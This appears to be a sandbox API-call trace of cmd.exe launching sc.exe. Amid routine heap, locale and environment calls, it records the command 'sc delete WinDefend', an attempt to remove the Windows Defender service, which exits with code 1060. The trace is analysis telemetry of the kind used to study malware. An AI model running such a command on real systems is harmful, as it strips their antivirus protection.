	[0085.207] GetProcessHeap () returned 0x240000
	[0085.207] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x8aa) returned 0x2501a8
	[0085.207] FreeEnvironmentStringsW (penv=0x252658) returned 1
	[0085.207] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0085.207] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0085.207] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0085.207] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0085.207] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0085.207] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0085.207] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0085.207] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0085.207] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0085.208] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0085.208] GetProcessHeap () returned 0x240000
	[0085.208] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x30) returned 0x250038
	[0085.208] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x23f7e4 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0085.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x23f7e4, lpFilePart=0x23f7e0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x23f7e0*="system32") returned 0x13
	[0085.208] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0085.208] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x23f560 | out: lpFindFileData=0x23f560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x250a60
	[0085.208] FindClose (in: hFindFile=0x250a60 | out: hFindFile=0x250a60) returned 1
	[0085.208] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x23f560 | out: lpFindFileData=0x23f560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x250a60
	[0085.208] FindClose (in: hFindFile=0x250a60 | out: hFindFile=0x250a60) returned 1
	[0085.209] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0085.209] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1
	[0085.209] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1
	[0085.209] GetProcessHeap () returned 0x240000
	[0085.209] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2501a8 | out: hHeap=0x240000) returned 1
	[0085.209] GetEnvironmentStringsW () returned 0x2501a8*
	[0085.209] GetProcessHeap () returned 0x240000
	[0085.209] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x8da) returned 0x252f40
	[0085.209] FreeEnvironmentStringsW (penv=0x2501a8) returned 1
	[0085.209] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a5a5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0085.209] GetProcessHeap () returned 0x240000
	[0085.209] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x250038 | out: hHeap=0x240000) returned 1
	[0085.209] GetProcessHeap () returned 0x240000
	[0085.209] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x400e) returned 0x253828
	[0085.209] GetProcessHeap () returned 0x240000
	[0085.209] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x34) returned 0x250038
	[0085.209] GetProcessHeap () returned 0x240000
	[0085.209] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x253828 | out: hHeap=0x240000) returned 1
	[0085.209] GetConsoleOutputCP () returned 0x1b5
	[0085.210] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5a4260 | out: lpCPInfo=0x4a5a4260) returned 1
	[0085.210] GetUserDefaultLCID () returned 0x409
	[0085.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a5a4950, cchData=8 | out: lpLCData=":") returned 2
	[0085.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x23f924, cchData=128 | out: lpLCData="0") returned 2
	[0085.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x23f924, cchData=128 | out: lpLCData="0") returned 2
	[0085.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x23f924, cchData=128 | out: lpLCData="1") returned 2
	[0085.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a5a4940, cchData=8 | out: lpLCData="/") returned 2
	[0085.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a5a4d80, cchData=32 | out: lpLCData="Mon") returned 4
	[0085.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a5a4d40, cchData=32 | out: lpLCData="Tue") returned 4
	[0085.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a5a4d00, cchData=32 | out: lpLCData="Wed") returned 4
	[0085.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a5a4cc0, cchData=32 | out: lpLCData="Thu") returned 4
	[0085.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a5a4c80, cchData=32 | out: lpLCData="Fri") returned 4
	[0085.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a5a4c40, cchData=32 | out: lpLCData="Sat") returned 4
	[0085.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a5a4c00, cchData=32 | out: lpLCData="Sun") returned 4
	[0085.211] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a5a4930, cchData=8 | out: lpLCData=".") returned 2
	[0085.211] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a5a4920, cchData=8 | out: lpLCData=",") returned 2
	[0085.211] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0085.216] GetProcessHeap () returned 0x240000
	[0085.216] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x20c) returned 0x240828
	[0085.216] GetConsoleTitleW (in: lpConsoleTitle=0x240828, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0085.243] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0085.243] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b4ac6c
	[0085.243] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0085.243] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b62732
	[0085.244] GetProcessHeap () returned 0x240000
	[0085.244] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x400a) returned 0x253828
	[0085.244] GetProcessHeap () returned 0x240000
	[0085.244] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x253828 | out: hHeap=0x240000) returned 1
	[0085.244] _wcsicmp (_String1="sc", _String2=")") returned 74
	[0085.244] _wcsicmp (_String1="FOR", _String2="sc") returned -13
	[0085.244] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13
	[0085.244] _wcsicmp (_String1="IF", _String2="sc") returned -10
	[0085.244] _wcsicmp (_String1="IF/?", _String2="sc") returned -10
	[0085.244] _wcsicmp (_String1="REM", _String2="sc") returned -1
	[0085.244] _wcsicmp (_String1="REM/?", _String2="sc") returned -1
	[0085.244] GetProcessHeap () returned 0x240000
	[0085.244] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x58) returned 0x240a40
	[0085.244] GetProcessHeap () returned 0x240000
	[0085.244] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xe) returned 0x24d508
	[0085.244] GetProcessHeap () returned 0x240000
	[0085.244] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2c) returned 0x240aa0
	[0085.245] GetConsoleTitleW (in: lpConsoleTitle=0x23f61c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0085.245] _wcsicmp (_String1="sc", _String2="DIR") returned 15
	[0085.245] _wcsicmp (_String1="sc", _String2="ERASE") returned 14
	[0085.245] _wcsicmp (_String1="sc", _String2="DEL") returned 15
	[0085.245] _wcsicmp (_String1="sc", _String2="TYPE") returned -1
	[0085.245] _wcsicmp (_String1="sc", _String2="COPY") returned 16
	[0085.245] _wcsicmp (_String1="sc", _String2="CD") returned 16
	[0085.245] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16
	[0085.245] _wcsicmp (_String1="sc", _String2="RENAME") returned 1
	[0085.245] _wcsicmp (_String1="sc", _String2="REN") returned 1
	[0085.245] _wcsicmp (_String1="sc", _String2="ECHO") returned 14
	[0085.245] _wcsicmp (_String1="sc", _String2="SET") returned -2
	[0085.245] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3
	[0085.245] _wcsicmp (_String1="sc", _String2="DATE") returned 15
	[0085.245] _wcsicmp (_String1="sc", _String2="TIME") returned -1
	[0085.245] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3
	[0085.246] _wcsicmp (_String1="sc", _String2="MD") returned 6
	[0085.246] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6
	[0085.246] _wcsicmp (_String1="sc", _String2="RD") returned 1
	[0085.246] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1
	[0085.246] _wcsicmp (_String1="sc", _String2="PATH") returned 3
	[0085.246] _wcsicmp (_String1="sc", _String2="GOTO") returned 12
	[0085.246] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5
	[0085.246] _wcsicmp (_String1="sc", _String2="CLS") returned 16
	[0085.246] _wcsicmp (_String1="sc", _String2="CALL") returned 16
	[0085.246] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3
	[0085.246] _wcsicmp (_String1="sc", _String2="VER") returned -3
	[0085.246] _wcsicmp (_String1="sc", _String2="VOL") returned -3
	[0085.246] _wcsicmp (_String1="sc", _String2="EXIT") returned 14
	[0085.246] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2
	[0085.246] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14
	[0085.246] _wcsicmp (_String1="sc", _String2="TITLE") returned -1
	[0085.246] _wcsicmp (_String1="sc", _String2="START") returned -17
	[0085.246] _wcsicmp (_String1="sc", _String2="DPATH") returned 15
	[0085.246] _wcsicmp (_String1="sc", _String2="KEYS") returned 8
	[0085.246] _wcsicmp (_String1="sc", _String2="MOVE") returned 6
	[0085.246] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3
	[0085.246] _wcsicmp (_String1="sc", _String2="POPD") returned 3
	[0085.246] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18
	[0085.246] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13
	[0085.246] _wcsicmp (_String1="sc", _String2="BREAK") returned 17
	[0085.246] _wcsicmp (_String1="sc", _String2="COLOR") returned 16
	[0085.246] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6
	[0085.246] _wcsicmp (_String1="sc", _String2="DIR") returned 15
	[0085.246] _wcsicmp (_String1="sc", _String2="ERASE") returned 14
	[0085.246] _wcsicmp (_String1="sc", _String2="DEL") returned 15
	[0085.246] _wcsicmp (_String1="sc", _String2="TYPE") returned -1
	[0085.246] _wcsicmp (_String1="sc", _String2="COPY") returned 16
	[0085.246] _wcsicmp (_String1="sc", _String2="CD") returned 16
	[0085.246] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16
	[0085.246] _wcsicmp (_String1="sc", _String2="RENAME") returned 1
	[0085.246] _wcsicmp (_String1="sc", _String2="REN") returned 1
	[0085.246] _wcsicmp (_String1="sc", _String2="ECHO") returned 14
	[0085.246] _wcsicmp (_String1="sc", _String2="SET") returned -2
	[0085.246] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3
	[0085.246] _wcsicmp (_String1="sc", _String2="DATE") returned 15
	[0085.247] _wcsicmp (_String1="sc", _String2="TIME") returned -1
	[0085.247] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3
	[0085.247] _wcsicmp (_String1="sc", _String2="MD") returned 6
	[0085.247] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6
	[0085.247] _wcsicmp (_String1="sc", _String2="RD") returned 1
	[0085.247] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1
	[0085.247] _wcsicmp (_String1="sc", _String2="PATH") returned 3
	[0085.247] _wcsicmp (_String1="sc", _String2="GOTO") returned 12
	[0085.247] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5
	[0085.247] _wcsicmp (_String1="sc", _String2="CLS") returned 16
	[0085.247] _wcsicmp (_String1="sc", _String2="CALL") returned 16
	[0085.247] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3
	[0085.247] _wcsicmp (_String1="sc", _String2="VER") returned -3
	[0085.247] _wcsicmp (_String1="sc", _String2="VOL") returned -3
	[0085.247] _wcsicmp (_String1="sc", _String2="EXIT") returned 14
	[0085.247] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2
	[0085.247] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14
	[0085.247] _wcsicmp (_String1="sc", _String2="TITLE") returned -1
	[0085.247] _wcsicmp (_String1="sc", _String2="START") returned -17
	[0085.247] _wcsicmp (_String1="sc", _String2="DPATH") returned 15
	[0085.247] _wcsicmp (_String1="sc", _String2="KEYS") returned 8
	[0085.247] _wcsicmp (_String1="sc", _String2="MOVE") returned 6
	[0085.247] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3
	[0085.247] _wcsicmp (_String1="sc", _String2="POPD") returned 3
	[0085.247] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18
	[0085.247] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13
	[0085.247] _wcsicmp (_String1="sc", _String2="BREAK") returned 17
	[0085.247] _wcsicmp (_String1="sc", _String2="COLOR") returned 16
	[0085.247] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6
	[0085.247] _wcsicmp (_String1="sc", _String2="FOR") returned 13
	[0085.247] _wcsicmp (_String1="sc", _String2="IF") returned 10
	[0085.247] _wcsicmp (_String1="sc", _String2="REM") returned 1
	[0085.247] GetProcessHeap () returned 0x240000
	[0085.247] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x210) returned 0x240ad8
	[0085.247] GetProcessHeap () returned 0x240000
	[0085.247] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x32) returned 0x240cf0
	[0085.247] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16
	[0085.248] GetProcessHeap () returned 0x240000
	[0085.248] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x418) returned 0x251da0
	[0085.248] SetErrorMode (uMode=0x0) returned 0x0
	[0085.248] SetErrorMode (uMode=0x1) returned 0x0
	[0085.248] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x251da8, lpFilePart=0x23f13c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x23f13c*="system32") returned 0x13
	[0085.248] SetErrorMode (uMode=0x0) returned 0x1
	[0085.248] GetProcessHeap () returned 0x240000
	[0085.248] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x251da0, Size=0x36) returned 0x251da0
	[0085.248] GetProcessHeap () returned 0x240000
	[0085.248] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x251da0) returned 0x36
	[0085.248] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0085.248] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0085.248] GetProcessHeap () returned 0x240000
	[0085.248] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x144) returned 0x240d30
	[0085.248] GetProcessHeap () returned 0x240000
	[0085.248] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x280) returned 0x251de0
	[0085.254] GetProcessHeap () returned 0x240000
	[0085.254] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x251de0, Size=0x146) returned 0x251de0
	[0085.254] GetProcessHeap () returned 0x240000
	[0085.254] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x251de0) returned 0x146
	[0085.254] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0085.254] GetProcessHeap () returned 0x240000
	[0085.254] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xe0) returned 0x240e80
	[0085.254] GetProcessHeap () returned 0x240000
	[0085.254] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x240e80, Size=0x76) returned 0x240e80
	[0085.254] GetProcessHeap () returned 0x240000
	[0085.254] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x240e80) returned 0x76
	[0085.255] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0085.255] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x23eeb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x23eeb8) returned 0x240f00
	[0085.255] GetProcessHeap () returned 0x240000
	[0085.255] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x14) returned 0x240f40
	[0085.255] FindClose (in: hFindFile=0x240f00 | out: hFindFile=0x240f00) returned 1
	[0085.255] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x23eeb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x23eeb8) returned 0xffffffff
	[0085.255] GetLastError () returned 0x2
	[0085.255] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x23eeb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x23eeb8) returned 0x240f00
	[0085.255] GetProcessHeap () returned 0x240000
	[0085.255] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x240f40, Size=0x4) returned 0x240f40
	[0085.255] FindClose (in: hFindFile=0x240f00 | out: hFindFile=0x240f00) returned 1
	[0085.256] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0085.256] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0085.256] GetConsoleTitleW (in: lpConsoleTitle=0x23f3b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0085.256] InitializeProcThreadAttributeList (in: lpAttributeList=0x23f238, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x23f300 | out: lpAttributeList=0x23f238, lpSize=0x23f300) returned 1
	[0085.256] UpdateProcThreadAttribute (in: lpAttributeList=0x23f238, dwFlags=0x0, Attribute=0x60001, lpValue=0x23f2f8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x23f238, lpPreviousValue=0x0) returned 1
	[0085.256] GetStartupInfoW (in: lpStartupInfo=0x23f1f4 | out: lpStartupInfo=0x23f1f4*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) 
	[0085.256] GetProcessHeap () returned 0x240000
	[0085.256] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x18) returned 0x240f00
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0085.256] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0085.257] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0085.257] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0085.257] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0085.257] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0085.257] GetProcessHeap () returned 0x240000
	[0085.257] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x240f00 | out: hHeap=0x240000) returned 1
	[0085.257] GetProcessHeap () returned 0x240000
	[0085.257] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xa) returned 0x24d520
	[0085.257] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1
	[0085.258] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc  delete WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x23f294*(cb=0x48, lpReserved=0x0, lpDesktop="", lpTitle="sc  delete WinDefend", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x23f2e0 | out: lpCommandLine="sc  delete WinDefend", lpProcessInformation=0x23f2e0*(hProcess=0x58, hThread=0x54, dwProcessId=0x9a0, dwThreadId=0x9a4)) returned 1
	[0085.261] CloseHandle (hObject=0x54) returned 1
	[0085.261] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0085.261] GetProcessHeap () returned 0x240000
	[0085.261] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x252f40 | out: hHeap=0x240000) returned 1
	[0085.261] GetEnvironmentStringsW () returned 0x2501a8*
	[0085.261] GetProcessHeap () returned 0x240000
	[0085.261] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x8da) returned 0x252f40
	[0085.261] FreeEnvironmentStringsW (penv=0x2501a8) returned 1
	[0085.261] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0
	[0085.308] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x23f1d4 | out: lpExitCode=0x23f1d4*=0x424) returned 1
	[0085.308] CloseHandle (hObject=0x58) returned 1
	[0085.308] _vsnwprintf (in: _Buffer=0x23f31c, _BufferCount=0x13, _Format="%08X", _ArgList=0x23f1e0 | out: _Buffer="00000424") returned 8
	[0085.308] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1
	[0085.308] GetProcessHeap () returned 0x240000
	[0085.308] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x252f40 | out: hHeap=0x240000) returned 1
	[0085.308] GetEnvironmentStringsW () returned 0x2520e8*
	[0085.309] GetProcessHeap () returned 0x240000
	[0085.309] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x900) returned 0x2529f0
	[0085.309] FreeEnvironmentStringsW (penv=0x2520e8) returned 1
	[0085.309] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0085.309] GetProcessHeap () returned 0x240000
	[0085.309] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2529f0 | out: hHeap=0x240000) returned 1
	[0085.309] GetEnvironmentStringsW () returned 0x2520e8*
	[0085.309] GetProcessHeap () returned 0x240000
	[0085.309] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x900) returned 0x2529f0
	[0085.309] FreeEnvironmentStringsW (penv=0x2520e8) returned 1
	[0085.309] GetProcessHeap () returned 0x240000
	[0085.309] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x24d520 | out: hHeap=0x240000) returned 1
	[0085.309] DeleteProcThreadAttributeList (in: lpAttributeList=0x23f238 | out: lpAttributeList=0x23f238) 
	[0085.309] _get_osfhandle (_FileHandle=1) returned 0x7
	[0085.309] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0085.309] _get_osfhandle (_FileHandle=1) returned 0x7
	[0085.309] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5a41ac | out: lpMode=0x4a5a41ac) returned 1
	[0085.309] _get_osfhandle (_FileHandle=0) returned 0x3
	[0085.309] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5a41b0 | out: lpMode=0x4a5a41b0) returned 1
	[0085.309] SetConsoleInputExeNameW () returned 0x1
	[0085.309] GetConsoleOutputCP () returned 0x1b5
	[0085.309] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5a4260 | out: lpCPInfo=0x4a5a4260) returned 1
	[0085.309] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0085.310] exit (_Code=1060) 

Process:
	id = "30"
	image_name = "sc.exe"
